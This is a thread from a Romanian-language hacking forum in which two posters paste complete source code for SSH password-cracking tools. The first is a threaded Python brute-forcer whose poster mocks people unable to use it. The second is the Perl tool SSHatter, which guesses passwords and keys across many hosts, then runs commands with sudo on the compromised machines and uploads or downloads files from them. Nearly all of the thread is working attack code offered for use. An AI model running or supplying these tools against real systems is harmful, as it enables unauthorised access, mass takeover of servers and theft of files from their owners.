Nytro Posted December 15, 2010 Report Posted December 15, 2010 E luat de pe Backtrack.#!/usr/bin/pythonimport threadimport timefrom threading import Threadimport sys, os,threading, time, traceback, getoptimport paramikoimport terminalglobal adxglobal portadx="1"port=22data=[]i=[]term = terminal.TerminalController()paramiko.util.log_to_file('demo.log')print "\n*************************************"print "*"+term.RED + "SSH Bruteforcer Ver. 0.2"+term.NORMAL+" *"print "*Coded by Christian Martorella *"print "*Edge-Security Research *"print "*laramies@gmail.com *"print "*************************************\n"def usage(): print "Usage: brutessh.py options \n" print " -h: destination host\n" print " -u: username to force\n" print " -d: password file \n" print " -t: threads (default 12, more could be bad)\n\n" print "Example: brutessh.py -h 192.168.1.55 -u root -d mypasswordlist.txt \n" sys.exit()class force(Thread): def __init__( self, name ): Thread.__init__(self) self.name = name def run(self): global adx if adx == "1": passw=self.name.split("\n")[0] t = paramiko.Transport(hostname) try: t.start_client() except Exception: x = 0 try: t.auth_password(username=username,password=passw) except Exception: x = 0 if t.is_authenticated(): print term.DOWN + term.GREEN + "\nAuth OK ---> Password Found: " + passw + term.DOWN + term.NORMAL t.close() adx = "0" else: print term.BOL + term.UP + term.CLEAR_EOL + passw + term.NORMAL t.close() time.sleep(0) i[0]=i[0]-1def test_thread(names): i.append(0) j=0 while len(names): try: if i[0]<th: n = names.pop(0) i[0]=i[0]+1 thread=force(n) thread.start() j=j+1 except KeyboardInterrupt: print "Attack suspended by user..\n" sys.exit() thread.join()def test(argv): global th global hostname global username th = 12 if len(sys.argv) < 3: usage() try : opts, args = getopt.getopt(argv,"h:u:d:t:") except getopt.GetoptError: usage() for opt,arg in opts : if opt == '-u': username = arg elif opt == '-h': hostname =arg elif opt == '-d': password = arg elif opt == "-t": th = arg try: f = open(password, "r") except: print "Can't open password file\n" sys.exit() print term.RED + "HOST: " +term.NORMAL + hostname + term.RED + " Username: " +term.NORMAL + username +term.RED + " Password file: " +term.NORMAL+ password print "===========================================================================" print "Trying password...\n" name = f.readlines() starttime = time.clock() test_thread(name) stoptime = time.clock() print "\nTimes -- > Init: "+ str(starttime) + " End: "+str(stoptime) print "\n"if __name__ == "__main__": try: test(sys.argv[1:]) except KeyboardInterrupt: print "Attack suspended by user...\n" sys.exit()Va descurcati. Daca nu sunteti in stare sa il folositi nici pe asta, lasati-va de astfel de prostii. (@ "hackerii de carton") Quote
adi003user Posted December 15, 2010 Report Posted December 15, 2010 #!/usr/bin/perl -w# $Header: /var/lib/cvsd/var/lib/cvsd/SSHatter/src/SSHatter.pl,v 1.12 2009-12-10 01:25:47 timb Exp $## Redistribution and use in source and binary forms, with or without# modification, are permitted provided that the following conditions are met:## * Redistributions of source code must retain the above copyright notice, this# list of conditions and the following disclaimer.# * Redistributions in binary form must reproduce the above copyright notice,# this list of conditions and the following disclaimer in the documentation# and/or other materials provided with the distribution.# * Neither the name of the Nth Dimension nor the names of its contributors may# be used to endorse or promote products derived from this software without# specific prior written permission.## THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE# POSSIBILITY OF SUCH DAMAGE.## (c) Tim Brown, 2009# <mailto:timb@nth-dimension.org.uk># <http://www.nth-dimension.org.uk/> / <http://www.machine.org.uk/>use strict;package SSHatter::SSH::Host;use Net::SSH::Perl;sub new { my $class; my $self; $class = shift; $self = {}; bless($self, $class); $self->{'hostname'} = shift; $self->{'portnumber'} = shift; return $self;}sub info { my $self; $self = shift; return $self->{'hostname'} . ":" . $self->{'portnumber'};}sub pipe { my $self; $self = shift; pipe($self->{'readhandle'}, $self->{'writehandle'});}sub checkbykey { my $self; my $username; my $key; my $sshhandle; $self = shift; $username = shift; $key = shift; eval { $sshhandle = Net::SSH::Perl->new($self->{'hostname'}, port => $self->{'portnumber'}, identity_files => [$key], options => ["PasswordAuthentication no"]); }; if ($@ ne "") { die "SSHatter::Exception::Host::Check::Net::SSH::Perl::New"; } else { eval { $sshhandle->login($username); $sshhandle->cmd("echo SSHatter"); }; if ($@ ne "") { if ($@ !~ /Permission denied/) { die "SSHatter::Exception::Host::Check::Net::SSH::Perl::Cmd"; } else { return 0; } } } return 1;}sub checkbypassword { my $self; my $username; my $password; my $sshhandle; $self = shift; $username = shift; $password = shift; eval { $sshhandle = Net::SSH::Perl->new($self->{'hostname'}, port => $self->{'portnumber'}); }; if ($@ ne "") { die "SSHatter::Exception::Host::Check::Net::SSH::Perl::New"; } else { eval { $sshhandle->login($username, $password); $sshhandle->cmd("echo SSHatter"); }; if ($@ ne "") { if ($@ !~ /Permission denied/) { die "SSHatter::Exception::Host::Check::Net::SSH::Perl::Cmd"; } else { return 0; } } } return 1;}sub writehandle { my $self; $self = shift; return $self->{'writehandle'};}sub readhandle { my $self; $self = shift; return $self->{'readhandle'};}sub unpipe { my $self; $self = shift; close($self->{'writehandle'});}sub addkey { my $self; my $username; my $key; $self = shift; $username = shift; $key = shift; $self->{'keys'}{$username} = $key;}sub addpassword { my $self; my $username; my $password; $self = shift; $username = shift; $password = shift; $self->{'passwords'}{$username} = $password;}sub usernamesbykey { my $self; $self = shift; return keys(%{$self->{'keys'}});}sub usernamesbypassword { my $self; $self = shift; return keys(%{$self->{'passwords'}});}sub key { my $self; my $username; $self = shift; $username = shift; return $self->{'keys'}{$username};}sub password { my $self; my $username; $self = shift; $username = shift; return $self->{'passwords'}{$username};}sub executebykey { my $self; my $username; my $commandstring; my $sshhandle; my @resultstrings; $self = shift; $username = shift; $commandstring = shift; eval { $sshhandle = Net::SSH::Perl->new($self->{'hostname'}, port => $self->{'portnumber'}, identity_files => [$self->{'keys'}{$username}], options => ["PasswordAuthentication no"]); }; if ($@ ne "") { die "SSHatter::Exception::Host::Check::Net::SSH::Perl::New"; } else { eval { print "[" . $username . ":" . $self->{'keys'}{$username} . "@" . $self->info() . "]\$ " . $commandstring . "\n"; $sshhandle->login($username); @resultstrings = $sshhandle->cmd($commandstring); }; if ($@ ne "") { if ($@ !~ /Permission denied/) { die "SSHatter::Exception::Host::Check::Net::SSH::Perl::Cmd"; } else { return ("", "", -42); } } } return @resultstrings;}sub executebypassword { my $self; my $username; my $sudoflag; my $commandstring; my $sshhandle; my @resultstrings; $self = shift; $username = shift; $sudoflag = shift; $commandstring = shift; eval { $sshhandle = Net::SSH::Perl->new($self->{'hostname'}, port => $self->{'portnumber'}); }; if ($@ ne "") { die "SSHatter::Exception::Host::Check::Net::SSH::Perl::New"; } else { eval { $sshhandle->login($username, $self->{'passwords'}{$username}); print "[" . $username . ":" . $self->{'passwords'}{$username} . "@" . $self->info() . "]\$ " . $commandstring . "\n"; if (defined($sudoflag)) { @resultstrings = $sshhandle->cmd($commandstring, $self->{'passwords'}{$username} . "\n"); } else { @resultstrings = $sshhandle->cmd($commandstring); } }; if ($@ ne "") { if ($@ !~ /Permission denied/) { die "SSHatter::Exception::Host::Check::Net::SSH::Perl::Cmd"; } else { return ("", "", -42); } } } return @resultstrings;}package SSHatter;use File::Basename;use Getopt::Std;use Parallel::ForkManager;my %argumentslist;my $maximumprocess;my $targetserverfilename;my $usernamefilename;my $keydirectoryname;my $passwordfilename;my $dumbflag;my $sudoflag;my $safeflag;my $masscommand;my $interactiveflag;my $localfilename;my $remotefilename;my $targetserverhandle;my $targetserverstring;my $hostname;my $portnumber;my $forkmanager;my $targetserver;my $processid;my $writehandle;my $usernamehandle;my $usernamestring;my $keyfilename;my $passwordhandle;my $passwordstring;my @targetservers;my $username;my $confirmresponse;my @resultstrings;my $nextcommand;my $localfilehandle;my $localfilebyte;my $localfiledata;sub parsetarget { my $targetserverstring; my $hostname; my $portnumber; $targetserverstring = shift; $targetserverstring =~ s/\x0a//g; ($hostname, $portnumber) = split(/:/, $targetserverstring); if ($portnumber && ($portnumber =~ /([0-9]+)/)) { $portnumber = $1; if (($portnumber <= 0) || ($portnumber > 65535)) { $portnumber = 22; } } else { $portnumber = 22; } return ($hostname, $portnumber);}sub main::HELP_MESSAGE { die "usage: " . basename($0) . " -x <maximumprocess> -t <targetserverfilename> -u <usernamefilename> <[-k <keydirectoryname>] [-p <passwordfilename>] [-d]> [[-0] [-s] -m <masscommand> | [-0] [-s] -i | -P <localfilename> | -G <remotefilename>] -d - dumb mode, try username equals password, username, blank -0 - sudo mode, echo the password to STDIN (useful for systems where sudo -S works) -s - safe mode, prompt before executing -m - mass mode, run one command across all targets -i - interactive mode, run multiple commands across all targets (non-persistant) -P - upload a file -G - download a fileIf sudo mode is not enabled, then " . $0 . " will block on STDIN.";}sub main::VERSION_MESSAGE { print basename($0) . " 1.0\n";}$Getopt::Std::STANDARD_HELP_VERSION = 1;getopts("x:t:u:k:p:d0sm:iP:G:", \%argumentslist);if (defined($argumentslist{'x'}) && ($argumentslist{'x'} =~ /([0-9]+)/)) { $maximumprocess = $1;} else { Getopt::Std::help_mess("", "main");}if (defined($argumentslist{'t'}) && (-e $argumentslist{'t'})) { $targetserverfilename = $argumentslist{'t'};} else { Getopt::Std::help_mess("", "main");}if (defined($argumentslist{'u'}) && (-e $argumentslist{'u'})) { $usernamefilename = $argumentslist{'u'};} else { Getopt::Std::help_mess("", "main");}if (defined($argumentslist{'k'}) && (-e $argumentslist{'k'})) { $keydirectoryname = $argumentslist{'k'};}if (defined($argumentslist{'p'}) && (-e $argumentslist{'p'})) { $passwordfilename = $argumentslist{'p'};}if (defined($argumentslist{'d'})) { $dumbflag = 1;}if (!defined($keydirectoryname) && !defined($passwordfilename) && !defined($dumbflag)) { Getopt::Std::help_mess("", "main");}if (defined($argumentslist{'0'})) { $sudoflag = 1;}if (defined($argumentslist{'s'})) { $safeflag = 1;}if (defined($argumentslist{'m'})) { $masscommand = $argumentslist{'m'};} else { if (defined($argumentslist{'i'})) { $interactiveflag = 1; } else { if (defined($argumentslist{'P'})) { if (-e $argumentslist{'P'}) { $localfilename = $argumentslist{'P'}; } else { Getopt::Std::help_mess("", "main"); } } else { if (defined($argumentslist{'G'})) { $remotefilename = $argumentslist{'G'}; } } }}$forkmanager = Parallel::ForkManager->new($maximumprocess);$forkmanager->run_on_finish(sub { my $processid; my $returncode; my $targetserver; my $readhandle; my $readdata; my $credentialtype; my $username; my $credentialstring; $processid = shift; $returncode = shift; $targetserver = shift; $targetserver->unpipe(); $readhandle = $targetserver->readhandle(); while ($readdata = <$readhandle>) { $readdata =~ s/\x0a//g; ($credentialtype, $username, $credentialstring) = split(/ /, $readdata); if ($credentialtype eq "K") { $targetserver->addkey($username, $credentialstring); } else { $targetserver->addpassword($username, $credentialstring); } } close($readhandle); print STDERR "I: " . $targetserver->info() . " finished\n";});open($targetserverhandle, "<" . $targetserverfilename);while ($targetserverstring = <$targetserverhandle>) { ($hostname, $portnumber) = parsetarget($targetserverstring); $targetserver = SSHatter::SSH::Host->new($hostname, $portnumber); print STDERR "I: " . $targetserver->info() . "\n"; push(@targetservers, $targetserver); $targetserver->pipe(); $processid = $forkmanager->start($targetserver) and next; $writehandle = $targetserver->writehandle(); open($usernamehandle, "<" . $usernamefilename); while ($usernamestring = <$usernamehandle>) { $usernamestring =~ s/\x0a//g; if (defined($keydirectoryname)) { while ($keyfilename = <$keydirectoryname/*>) { if ($targetserver->checkbykey($usernamestring, $keyfilename) == 1) { print $writehandle "K" . " " . $usernamestring . " " . $keyfilename . "\n"; } } } if (defined($passwordfilename)) { open($passwordhandle, "<" . $passwordfilename); while ($passwordstring = <$passwordhandle>) { $passwordstring =~ s/\x0a//g; if ($targetserver->checkbypassword($usernamestring, $passwordstring) == 1) { print $writehandle "P" . " " . $usernamestring . " " . $passwordstring . "\n"; } } close($passwordhandle); } if (defined($dumbflag)) { foreach $passwordstring (("", "password", $usernamestring)) { if ($targetserver->checkbypassword($usernamestring, $passwordstring) == 1) { print $writehandle "P" . " " . $usernamestring . " " . $passwordstring . "\n"; } } } } close($usernamehandle); $forkmanager->finish();}close($targetserverhandle);$forkmanager->wait_all_children();foreach $targetserver (@targetservers) { foreach $username ($targetserver->usernamesbykey()) { print $username . ":" . $targetserver->key($username) . "@" . $targetserver->info() . "\n"; } foreach $username ($targetserver->usernamesbypassword()) { print $username . ":" . $targetserver->password($username) . "@" . $targetserver->info() . "\n"; }}if ((defined($masscommand) || defined($interactiveflag)) && defined($safeflag)) { print "W: executing " . (defined($masscommand) ? $masscommand : "in interactive mode") . ", continue? [y/N] "; $confirmresponse = <>; if ($confirmresponse !~ /^[Yy]/) { exit(1); }}if (defined($masscommand)) { foreach $targetserver (@targetservers) { foreach $username ($targetserver->usernamesbykey()) { @resultstrings = $targetserver->executebykey($username, $masscommand); if (($resultstrings[2] != -42) && defined($resultstrings[0])) { print $resultstrings[0]; } } foreach $username ($targetserver->usernamesbypassword()) { @resultstrings = $targetserver->executebypassword($username, $sudoflag, $masscommand); if (($resultstrings[2] != -42) && defined($resultstrings[0])) { print $resultstrings[0]; } } }} else { if (defined($interactiveflag)) { print "\$ "; while ($nextcommand = <>) { $nextcommand =~ s/\x0a//g; if ($nextcommand eq "exit") { last; } else { if ($nextcommand =~ /put (.*)/) { open($localfilehandle, "<" . $1); binmode($localfilehandle); while (read($localfilehandle, $localfilebyte, 1) != 0) { $localfiledata .= sprintf("\\x%02x", ord($localfilebyte)); } close($localfilehandle); foreach $targetserver (@targetservers) { foreach $username ($targetserver->usernamesbykey()) { @resultstrings = $targetserver->executebykey($username, "printf \"" . $localfiledata . "\" >> " . basename($1)); if (($resultstrings[2] != -42) && defined($resultstrings[0])) { print $resultstrings[0]; } } foreach $username ($targetserver->usernamesbypassword()) { @resultstrings = $targetserver->executebypassword($username, 0, "printf \"" . $localfiledata . "\" >> " . basename($1)); if (($resultstrings[2] != -42) && defined($resultstrings[0])) { print $resultstrings[0]; } } } } else { if ($nextcommand =~ /get (.*)/) { foreach $targetserver (@targetservers) { foreach $username ($targetserver->usernamesbykey()) { @resultstrings = $targetserver->executebykey($username, "cat " . $1); if (($resultstrings[2] != -42) && defined($resultstrings[0])) { open($localfilehandle, ">" . $username . "@" . $targetserver->info() . "-" . basename($1)); print $localfilehandle $resultstrings[0]; close($localfilehandle); } } foreach $username ($targetserver->usernamesbypassword()) { @resultstrings = $targetserver->executebypassword($username, 0, "cat " . $1); if (($resultstrings[2] != -42) && defined($resultstrings[0])) { open($localfilehandle, ">" . $username . "@" . $targetserver->info() . "-" . basename($1)); print $localfilehandle $resultstrings[0]; close($localfilehandle); } } } } else { foreach $targetserver (@targetservers) { foreach $username ($targetserver->usernamesbykey()) { @resultstrings = $targetserver->executebykey($username, $nextcommand); if (($resultstrings[2] != -42) && defined($resultstrings[0])) { print $resultstrings[0]; } } foreach $username ($targetserver->usernamesbypassword()) { @resultstrings = $targetserver->executebypassword($username, $sudoflag, $nextcommand); if (($resultstrings[2] != -42) && defined($resultstrings[0])) { print $resultstrings[0]; } } } } } } print "\$ "; } } else { if (defined($localfilename)) { open($localfilehandle, "<" . $localfilename); binmode($localfilehandle); while (read($localfilehandle, $localfilebyte, 1) != 0) { $localfiledata .= sprintf("\\x%02x", ord($localfilebyte)); } close($localfilehandle); foreach $targetserver (@targetservers) { foreach $username ($targetserver->usernamesbykey()) { @resultstrings = $targetserver->executebykey($username, "printf \"" . $localfiledata . "\" >> " . basename($localfilename)); if (($resultstrings[2] != -42) && defined($resultstrings[0])) { print $resultstrings[0]; } } foreach $username ($targetserver->usernamesbypassword()) { @resultstrings = $targetserver->executebypassword($username, 0, "printf \"" . $localfiledata . "\" >> " . basename($localfilename)); if (($resultstrings[2] != -42) && defined($resultstrings[0])) { print $resultstrings[0]; } } } } else { if (defined($remotefilename)) { foreach $targetserver (@targetservers) { foreach $username ($targetserver->usernamesbykey()) { @resultstrings = $targetserver->executebykey($username, "cat " . $remotefilename); if (($resultstrings[2] != -42) && defined($resultstrings[0])) { open($localfilehandle, ">" . $username . "@" . $targetserver->info() . "-" . basename($remotefilename)); print $localfilehandle $resultstrings[0]; close($localfilehandle); } } foreach $username ($targetserver->usernamesbypassword()) { @resultstrings = $targetserver->executebypassword($username, 0, "cat " . $remotefilename); if (($resultstrings[2] != -42) && defined($resultstrings[0])) { open($localfilehandle, ">" . $username . "@" . $targetserver->info() . "-" . basename($remotefilename)); print $localfilehandle $resultstrings[0]; close($localfilehandle); } } } } } }}exit(1);sshatter Quote
